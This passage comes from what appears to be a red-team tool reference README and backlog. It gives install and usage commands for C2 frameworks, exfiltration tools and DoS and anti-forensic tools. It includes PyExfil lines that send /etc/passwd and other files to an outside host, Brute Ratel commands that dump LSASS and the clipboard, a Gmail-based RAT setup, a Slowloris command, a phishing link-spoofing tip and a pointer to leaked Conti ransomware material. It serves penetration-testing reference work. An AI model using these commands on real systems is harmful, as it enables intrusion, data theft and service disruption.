3504 |
3505 | **Install: (Installer)**
3506 |
3507 | ```bash
3508 | curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
3509 | chmod 755 msfinstall && \
3510 | ./msfinstall
3511 | ```
3512 |
3513 | **Usage:**
3514 |
3515 | ```bash
3516 | /opt/metasploit-framework/bin/msfconsole
3517 | ```
3518 |
3519 | Full installation instructions can be found on the official [wiki](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html).
3520 |
3521 | [Rapid7 Metasploit blogs](https://www.rapid7.com/blog/tag/metasploit/)
3522 |
3523 | [Cheat sheet graphic](https://cdn.comparitech.com/wp-content/uploads/2019/06/Metasploit-Cheat-Sheet.webp)
3524 |
3525 | [Nice command list](https://github.com/security-cheatsheet/metasploit-cheat-sheet)
3526 |
3527 | 
3528 |
3529 | *Image used from https://goacademy.io/how-to-install-metasploit-on-kali-linux/*
3530 |
3531 | ### [🔙](#tool-list)[Pupy](https://github.com/n1nj4sec/pupy)
3532 |
3533 | Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and C.
3534 |
3535 | It allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging, and taking screen shots.
3536 |
3537 | **Install: (Git)**
3538 |
3539 | ```bash
3540 | sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
3541 | git clone --recursive https://github.com/n1nj4sec/pupy
3542 | cd pupy
3543 | python create-workspace.py -DG pupyw
3544 | ```
3545 |
3546 | Roll fix to fix the error:
3547 |
3548 | ```bash
3549 | sudo pip2 install rpyc==3.4.4
3550 | ```
3551 |
3552 | Start:
3553 |
3554 | ```bash
3555 | export PATH=$PATH:~/.local/bin; pupysh
3556 | pupyws/bin/pupysh
3557 | ```
3558 |
3559 | *Git install instructions used from [here](https://kalitut.com/how-to-install-pupy/).*
3560 |
3561 | **Install: (Docker)**
3562 |
3563 | For detailed docker and pupy installation instructions see the [wiki](https://github.com/n1nj4sec/pupy/wiki/Installation).
3564 |
3565 | **Usage:**
3566 |
3567 | ```bash
3568 | # Get help page for any builtin commands with -h
3569 | >> sessions -h
3570 | >> jobs -h
3571 | >> run -h
3572 |
3573 | # Interact with session 1
3574 | >> sessions -i 1
3575 |
3576 | # Run local command 'ls'
3577 | >> !ls
3578 | ```
3579 |
3580 | Full usage information can be found on the [wiki](https://github.com/n1nj4sec/pupy/wiki/Basic-Usage).
3581 |
3582 | The wiki contains good [post exploitation information](https://github.com/n1nj4sec/pupy/wiki/Post-Exploitation).
3583 |
3584 | 
3585 |
3586 | *Image used from https://github.com/n1nj4sec/pupy/wiki/Screenshots*
3587 |
3588 | ### [🔙](#tool-list)[Brute Ratel](https://bruteratel.com/)
3589 |
3590 | BruteRatel is a great command and control (C4) framework created by [@NinjaParanoid](https://twitter.com/NinjaParanoid). The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team.
3591 |
3592 | The client and server communicate with each other using various communication channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection.
3593 |
3594 | Some nice features:
3595 |
3596 | - DNS Over HTTPS
3597 | - Indirect Syscalls
3598 | - Built-in Debugger To Detect EDR Userland Hooks
3599 | - MITRE graph integration
3600 | - Adversary TTP automation
3601 |
3602 | **Install:**
3603 |
3604 | To legally get access to the framework you will need to buy a licence (1 Year $2500 per user). See the [pricing page](https://bruteratel.com/pricing/) for more information.
3605 |
3606 | After purchase you can download the framework from [here](https://bruteratel.com/tabs/download/) with your Activation Key and License User ID.
3607 |
3608 | **Usage:**
3609 |
3610 | ```bash
3611 | # Loads a powershell script to memory which can be Invoked using psreflect
3612 | psimport
3613 |
3614 | # Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock
3615 | lock_input
3616 |
3617 | # Dumps user clipboard
3618 | dumpclip
3619 |
3620 | # Enumerates basic domain information
3621 | dcenum
3622 |
3623 | # Elevates user privileges to SYSTEM (Requires admin rights)
3624 | get_system
3625 |
3626 | # Takes a screenshot of current desktop and stores it on the server
3627 | screenshot
3628 |
3629 | # Dumps LSASS to C:\Windows\Memory.DMP using the PssCaptureSnapshot technique
3630 | shadowclone
3631 | ```
3632 |
3633 | Full commander terminal usage information can be found [here](https://bruteratel.com/tabs/badger/badgers/).
3634 |
3635 | 
3636 |
3637 | *Image used from https://bruteratel.com/*
3638 |
3639 | Exfiltration
3640 | ====================
3641 |
3642 | ### [🔙](#tool-list)[Dnscat2](https://github.com/iagox86/dnscat2)
3643 |
3644 | A tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT).
3645 |
3646 | The tool is designed to be stealthy and difficult to detect, as it uses legitimate DNS traffic to transmit data.
3647 |
3648 | **Install: (Compile - Server)**
3649 |
3650 | ```bash
3651 | git clone https://github.com/iagox86/dnscat2.git
3652 | cd dnscat2/server/
3653 | gem install bundler
3654 | bundle install
3655 | ```
3656 |
3657 | **Install: (Compile - Client)**
3658 |
3659 | ```bash
3660 | git clone https://github.com/iagox86/dnscat2.git
3661 | cd dnscat2/client/
3662 | make
3663 | ```
3664 |
3665 | Full installation information can be found in the [Installation Section](https://github.com/iagox86/dnscat2#compiling).
3666 |
3667 | **Usage: (Server)**
3668 |
3669 | ```bash
3670 | # Establish the server
3671 | ruby ./dnscat2.rb DOMAIN.COM
3672 | ```
3673 |
3674 | **Usage: (Client)**
3675 |
3676 | ```bash
3677 | # Establish the client with authoritative domain
3678 | ./dnscat2 DOMAIN.COM
3679 |
3680 | # Establish the client without authoritative domain
3681 | ./dnscat2 --dns host=0.0.0.0,port=0000
3682 |
3683 | # Ping the server from the client
3684 | ./dnscat --ping DOMAIN.COM
3685 |
3686 | # Ping the server from the client, with custom dns resolver ip
3687 | ./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping
3688 | ```
3689 |
3690 | **Usage: (Tunnels)**
3691 |
3692 | ```bash
3693 | # (After establishing the client) You can open a new tunnelled port
3694 | listen [lhost:]lport rhost:rport
3695 |
3696 | # Forward ssh connections through the dnscat2 client to an internal device
3697 | listen 127.0.0.1:2222 10.10.10.10:22
3698 | ```
3699 |
3700 | Full usage information can be found in the [Usage Section](https://github.com/iagox86/dnscat2#usage).
3701 |
3702 | 
3703 |
3704 | ### [🔙](#tool-list)[Cloakify](https://github.com/TryCatchHCF/Cloakify)
3705 |
3706 | When exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. Cloakify reduces this risk by transforming the data.
3707 |
3708 | Cloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight, and transfer the file without triggering alerts.
3709 |
3710 | **Note:** You can make your own ciphers, see [here](https://github.com/TryCatchHCF/Cloakify#create-your-own-cipers) for more info.
3711 |
3712 | **Install:**
3713 |
3714 | ```bash
3715 | git clone https://github.com/TryCatchHCF/Cloakify
3716 | ```
3717 |
3718 | **Usage:**
3719 |
3720 | ```bash
3721 | # Cloakify some text
3722 | python3 cloakify.py TEXT.txt ciphers/desserts.ciph > TEXT.cloaked
3723 |
3724 | # De-Cloakify the text
3725 | python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph
3726 | ```
3727 |
3728 | 
3729 |
3730 | 
3731 |
3732 | ### [🔙](#tool-list)[PyExfil](https://github.com/ytisf/PyExfil)
3733 |
3734 | "An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration is real-world scenarios."
3735 |
3736 | **Install:**
3737 |
3738 | ```bash
3739 | git clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install
3740 | ```
3741 |
3742 | **Usage:** (Full Usage [here](https://github.com/ytisf/PyExfil/blob/master/USAGE.md))
3743 |
3744 | #### HTTP Cookies
3745 |
3746 | ```python
3747 | from pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen
3748 |
3749 | # For Client (exfil)
3750 | send_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL)
3751 |
3752 | # For Server (collecting)
3753 | listen(local_addr='127.0.0.1', local_port=80)
3754 | ```
3755 |
3756 | #### ICMP Echo 8
3757 |
3758 | ```python
3759 | from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener
3760 |
3761 | # For Client (exfil)
3762 | ip_addr = "127.0.0.1"
3763 | send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1)
3764 |
3765 | # For Server (collecting)
3766 | init_listener(ip_addr, saving_location="/tmp/")
3767 | ```
3768 |
3769 | #### NTP Request
3770 |
3771 | ```python
3772 | from pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT
3773 |
3774 | # For Client (exfil)
3775 | ip_addr = "127.0.0.1"
3776 | exfiltrate("/etc/passwd", ip_addr, time_delay=0.1)
3777 |
3778 | # For Server (collecting)
3779 | ntp_listener(ip="0.0.0.0", port=NTP_UDP_PORT)
3780 | ```
3781 |
3782 | 
3783 |
3784 | ### [🔙](#tool-list)[Powershell RAT](https://github.com/Viralmaniar/Powershell-RAT)
3785 |
3786 | Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.
3787 |
3788 | **Install:**
3789 |
3790 | ```bash
3791 | git clone https://github.com/Viralmaniar/Powershell-RAT
3792 | ```
3793 |
3794 | **Usage:** (Full Usage [here](https://github.com/Viralmaniar/Powershell-RAT/blob/master/README.md))
3795 |
3796 | #### Setup
3797 |
3798 | - Throwaway Gmail address
3799 | - Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps
3800 | - Modify the `$username` & `$password` variables for your account in the Mail.ps1 Powershell file
3801 | - Modify `$msg.From` & `$msg.To.Add` with throwaway gmail address
3802 |
3803 | 
3804 |
3805 | ### [🔙](#tool-list)[GD-Thief](https://github.com/antman1p/GD-Thief)
3806 |
3807 | Tool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.
3808 |
3809 | This includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.
3810 |
3811 | **Install:**
3812 |
3813 | ```bash
3814 | git clone https://github.com/antman1p/GD-Thief.git
3815 | cd GD-Thief
3816 | pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib
3817 | ```
3818 |
3819 | then...
3820 |
3821 | 1. Create a new Google Cloud Platform (GCP) project
3822 | 2. Enable a Google Workspace API
3823 | 3. Configure OAuth Consent screen
3824 | 4. Create a credential
3825 | 5. Add the victim's Google account to the Application's Test Users
3826 |
3827 | For detailed setup instructions see the [How To Guide](https://github.com/antman1p/GD-Thief#how-to).
3828 |
3829 | **Usage:**
3830 |
3831 | ```bash
3832 | usage:
3833 | python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d ]}
3834 | [-t ]
3835 |
3836 | help:
3837 |
3838 | This Module will connect to Google's API using an access token and exfiltrate files
3839 | from a target's Google Drive. It will output exfiltrated files to the ./loot directory
3840 |
3841 | arguments:
3842 | -m [{dlAll, dlDict}],
3843 | --mode [{dlAll, dlDict}]
3844 | The mode of file download
3845 | Can be "dlAll", "dlDict [-d ]", or... (More options to come)
3846 |
3847 | optional arguments:
3848 | -d , --dict
3849 | Path to the dictionary file. Mandatory with download mode"-m, --mode dlDict"
3850 | You can use the provided dictionary, per example: "-d ./dictionaries/secrets-keywords.txt"
3851 | -t , --threads
3852 | Number of threads. (Too many could exceeed Google's rate limit threshold)
3853 |
3854 | -h, --help
3855 | show this help message and exit
3856 | ```
3857 |
3858 | Nice [blog post](https://antman1p-30185.medium.com/youre-a-gd-thief-1e02358fd557) explaining the logic behind the tool.
3859 |
3860 | Impact
3861 | ====================
3862 |
3863 | ### [🔙](#tool-list)[Conti Pentester Guide Leak](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak)
3864 |
3865 | Conti is a ransomware group that is known for targeting large organizations and using sophisticated tactics to evade detection and maximize the impact of their attacks.
3866 |
3867 | Conti has been responsible for a number of high-profile ransomware attacks, including ones against the computer systems of the City of Pensacola, Florida, and the computer systems of the Irish health service.
3868 |
3869 | The [Conti Pentester Guide Leak - Repository](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) contains leaked pentesting materials given to Conti ransomware group affilates.
3870 |
3871 | Topics include:
3872 |
3873 | - Configuring Rclone with MEGA for data exfiltration
3874 | - Configuring AnyDesk as persistence and remote access into a victim’s network
3875 | - Elevating and gaining admin rights inside a company’s hacked network
3876 | - Taking over domain controllers
3877 | - Dumping passwords from Active Directory
3878 |
3879 | **Note:** *[vx-underground.org](https://www.vx-underground.org/) obtained more training materials and tools used by Conti ransomware operators [here](https://share.vx-underground.org/Conti/).*
3880 |
3881 | 
3882 |
3883 | *Image used from https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak*
3884 |
3885 | ### [🔙](#tool-list)[SlowLoris](https://github.com/gkbrk/slowloris)
3886 |
3887 | Slowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from being able to process legitimate requests.
3888 |
3889 | This attack would typically be conducted with a botnet, it is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic.
3890 |
3891 | **Install: (Pip)**
3892 |
3893 | ```bash
3894 | sudo pip3 install slowloris
3895 | ```
3896 |
3897 | **Install: (Git)**
3898 |
3899 | ```bash
3900 | git clone https://github.com/gkbrk/slowloris.git
3901 | cd slowloris
3902 | ```
3903 |
3904 | **Usage:**
3905 |
3906 | ```bash
3907 | # Pip
3908 | slowloris example.com
3909 |
3910 | # Git
3911 | python3 slowloris.py example.com
3912 | ```
3913 |
3914 | 
3915 |
3916 | ### [🔙](#tool-list)[usbkill](https://github.com/hephaest0s/usbkill)
3917 |
3918 | This is an anti-forensic kill-switch that waits for a change in USB port status, immediately shutting down endpoint if a change is detected.
3919 |
3920 | In some situations, it is imperative that no data is added or removed from an endpoint via USB.
3921 |
3922 | This is where USBkill comes in.
3923 |
3924 | **Install:**
3925 |
3926 | ```
3927 | git clone https://github.com/hephaest0s/usbkill
3928 | cd usbkill
3929 | ./setup.py install
3930 | ```
3931 |
3932 | **Usage:**
3933 |
3934 | ```bash
3935 | sudo python3 usbkill.py
3936 | ```
3937 |
3938 | 
3939 |
3940 | *Image used from https://en.wikipedia.org/wiki/USBKill*
3941 |
3942 | Modified readme of A-POC cheetsheet
3943 |
--------------------------------------------------------------------------------
/backlog:
--------------------------------------------------------------------------------
1 | Red Teaming Tips
2 | Using PreventDefault() in JavaScript, you are able to create a spoofed link that previews one site but goes to another on your phishing site
3 | Have blue hidden the ways including winkey+R? Try shift and right click desktop and open command prompt
4 | RCE on a web application for less mature client? nslookup -q=srv _ldap._tcp if its domain joined Invoke-Kerberoast
5 | Reconnaissance
6 | https://github.com/smicallef/spiderfoot
7 | https://github.com/cvandeplas/pystemon
8 | Resource Development
9 | Windows Patch Reversing (PatchExtract.ps1) | https://twitter.com/laughing_mantis/status/842100719385698305
10 | Initial Access
11 | -
12 | Execution
13 | -
14 | Persistence
15 | https://github.com/leoloobeek/COMProxy (Prevent application crashes during COM Object Search Order Hijacking)
16 | Privilege Escalation
17 | -
18 | Defense Evasion
19 | -
20 | Credential Access
21 | https://github.com/GhostPack/KeeThief
22 | Discovery
23 | -
24 | Lateral Movement
25 | -
26 | Collection
27 | -
28 | Command and Control
29 | https://www.thec2matrix.com/
30 | Empire
31 | Koadic
32 | Mythic
33 | PoshC2
34 | Sliver
35 | Exfiltration
36 | -
37 | Impact
38 | https://github.com/hephaest0s/usbkill
39 |
--------------------------------------------------------------------------------